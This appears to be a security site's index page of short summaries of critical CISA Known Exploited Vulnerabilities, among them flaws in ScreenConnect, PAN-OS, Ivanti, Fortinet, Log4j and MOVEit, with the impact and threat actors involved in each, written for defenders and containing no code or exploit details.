Technical deep-dives into Critical and High-severity CISA Known Exploited Vulnerabilities (CVSS 7.0+) — the confirmed active threats that matter most to defenders.
A path traversal vulnerability in ConnectWise ScreenConnect enables unauthenticated remote code execution, exploited extensively in ransomware campaigns targeting managed service providers.
An out-of-bounds write vulnerability in PAN-OS's Captive Portal and User-ID service allows unauthenticated remote code execution as root on PA-Series and VM-Series firewalls.
An incorrect resource transfer between security domains in the Linux kernel allows a local unprivileged user to escalate to root privileges, affecting a broad range of distributions.
Authentication bypass in Cisco Catalyst SD-WAN Manager and Controller allows unauthenticated remote attackers to gain full administrative privileges without credentials.
A SQL injection vulnerability in BerriAI LiteLLM allows authenticated attackers to read and modify the proxy database, exposing stored API keys for OpenAI, Anthropic, and other LLM providers.
An authentication bypass vulnerability in cPanel & WHM's login flow grants unauthenticated attackers full control panel access, affecting millions of web hosting deployments worldwide.
A reflected cross-site scripting vulnerability in Exchange Server's Outlook Web Access (OWA) enables arbitrary JavaScript execution in victim browsers, facilitating session hijacking and credential theft under specific interaction conditions.
Improper input validation in Ivanti Endpoint Manager Mobile (EPMM) allows an authenticated administrator to execute arbitrary OS commands, leading to full server compromise.
A high-severity deserialization vulnerability in Microsoft SharePoint Server allows an authenticated attacker with Site Owner permissions to execute arbitrary code on the server, exploited in the wild for persistent access and network reconnaissance in targeted intrusion campaigns.
A high-severity use-after-free vulnerability in the Windows Common Log File System (CLFS) driver allows local attackers to escalate privileges to SYSTEM, actively exploited as a zero-day by ransomware operators before Microsoft's April 2025 Patch Tuesday.
A high-severity unrestricted file upload and download vulnerability in Cleo's Harmony, VLTrader, and LexiCom MFT products allows remote attackers to execute arbitrary commands, serving as the precursor exploit chain to the more critical CVE-2024-55956 zero-day exploitation campaign.
A critical stack-based buffer overflow in Ivanti Connect Secure allows unauthenticated remote attackers to execute arbitrary code, exploited as a zero-day in targeted campaigns before Ivanti's January 2025 advisory, following the pattern of prior Ivanti VPN zero-day exploitation.
A critical unrestricted file upload vulnerability in Cleo's managed file transfer products (Harmony, VLTrader, LexiCom) allows unauthenticated attackers to upload and execute arbitrary code, exploited by the Clop ransomware group in a wave of targeted data theft attacks.
A critical information disclosure vulnerability in ownCloud's graphapi app exposes PHP environment variables including admin passwords, mail server credentials, and license keys to unauthenticated attackers via a publicly accessible URL.
A server-side request forgery vulnerability in Ivanti Connect Secure and Policy Secure's SAML component allows unauthenticated attackers to access restricted resources, exploited as part of a multi-CVE attack chain targeting government and enterprise VPN infrastructure.
A critical account takeover vulnerability in GitLab CE/EE allows unauthenticated attackers to send password reset emails to arbitrary email addresses, enabling complete account hijacking without user interaction, including of administrator accounts.
A critical OGNL injection vulnerability in Atlassian Confluence Server and Data Center allows unauthenticated attackers to execute arbitrary commands via crafted HTTP requests, exploited as a zero-day in targeted attacks before patch availability.
A critical SQL injection vulnerability in Ivanti Endpoint Manager's Core server allows unauthenticated attackers on the same network to execute arbitrary code via the DAS component, confirmed as actively exploited by CISA in September 2024.
A critical pre-authentication bypass in JetBrains TeamCity allows unauthenticated attackers to create admin tokens and gain full server control, exploited by APT29 and North Korean actors in supply chain intrusion campaigns targeting software development pipelines.
A high-severity pre-authentication remote code execution vulnerability in Fortra's GoAnywhere Managed File Transfer was exploited as a zero-day by the Cl0p ransomware group, compromising over 130 organisations before a patch was available.
A critical YAML deserialization vulnerability in IBM Aspera Faspex's API allows unauthenticated remote attackers to execute arbitrary code, exploited by ransomware groups within days of public disclosure via a pre-authentication attack path.
A critical argument injection vulnerability in PHP-CGI on Windows allows unauthenticated remote attackers to execute arbitrary PHP code by exploiting how PHP handles Unicode character conversion in CGI mode, affecting XAMPP and other common Windows PHP deployments.
A critical SQL injection vulnerability in Fortinet FortiClientEMS allows unauthenticated remote attackers to execute arbitrary commands via crafted requests to the management server, with active exploitation confirmed by multiple threat intelligence sources.
A critical format string vulnerability in Fortinet FortiOS, FortiProxy, FortiPAM, and FortiWeb's fgfmd daemon allows unauthenticated remote attackers to execute arbitrary commands via specially crafted requests to the FGFM protocol.
A critical zero-day privilege escalation in Cisco IOS XE's web UI feature allows unauthenticated remote attackers to create administrator-level accounts, exploited massively to implant a persistent backdoor on tens of thousands of Cisco network devices.
A critical authentication bypass in F5 BIG-IP's iControl REST API allows unauthenticated remote attackers with network access to the management interface to execute arbitrary system commands as root, massively exploited within days of disclosure.
A critical JNDI injection vulnerability in Apache Log4j 2 allows unauthenticated remote code execution by logging a specially crafted string, affecting an enormous portion of the Java application ecosystem and triggering one of the most urgent security responses in history.
A signal handler race condition in OpenSSH's sshd allows unauthenticated remote code execution as root on glibc-based Linux systems, a regression of a 2006 vulnerability reintroduced in OpenSSH 8.5p1.
A critical SQL injection vulnerability in Progress Software MOVEit Transfer allows unauthenticated attackers to escalate privileges and achieve remote code execution, exploited at massive scale by the Cl0p ransomware group in a wave of data theft affecting thousands of organisations.
A critical information disclosure vulnerability in Citrix NetScaler ADC and Gateway allows unauthenticated attackers to retrieve session tokens from device memory, enabling session hijacking without requiring any credentials.
A critical heap-based buffer overflow in Fortinet FortiOS and FortiProxy SSL-VPN allows pre-authentication remote attackers to execute arbitrary code, actively exploited by multiple threat actors including ransomware groups and nation-state APTs.
A critical privilege escalation vulnerability in Atlassian Confluence Data Center and Server allows unauthenticated attackers to create administrator accounts by accessing a restricted endpoint, exploited as a zero-day in targeted attacks.
A critical out-of-bounds write vulnerability in Fortinet FortiOS SSL VPN allows unauthenticated remote attackers to achieve arbitrary code execution via specially crafted HTTP requests, with active exploitation observed in CISA KEV.
An authentication bypass vulnerability in Ivanti Connect Secure and Policy Secure allows remote attackers to circumvent authentication controls via crafted URL path traversal, typically chained with CVE-2024-21887 for unauthenticated RCE.
A critical authentication bypass in ConnectWise ScreenConnect's setup wizard endpoint allows unauthenticated attackers to create new administrator accounts, immediately followed by RCE via the companion path traversal vulnerability CVE-2024-1708.
A critical authentication bypass in JetBrains TeamCity's web server allows unauthenticated attackers to gain administrative control and achieve remote code execution, leading to widespread supply chain compromise campaigns.
A critical command injection vulnerability in Palo Alto Networks PAN-OS GlobalProtect gateway allows unauthenticated remote attackers to execute arbitrary commands as root, actively exploited as a zero-day before patch availability.
A command injection vulnerability in Ivanti Connect Secure and Policy Secure allows authenticated administrators to execute arbitrary commands, chained with CVE-2023-46805 for zero-click unauthenticated RCE in the wild.
No articles match the selected filter.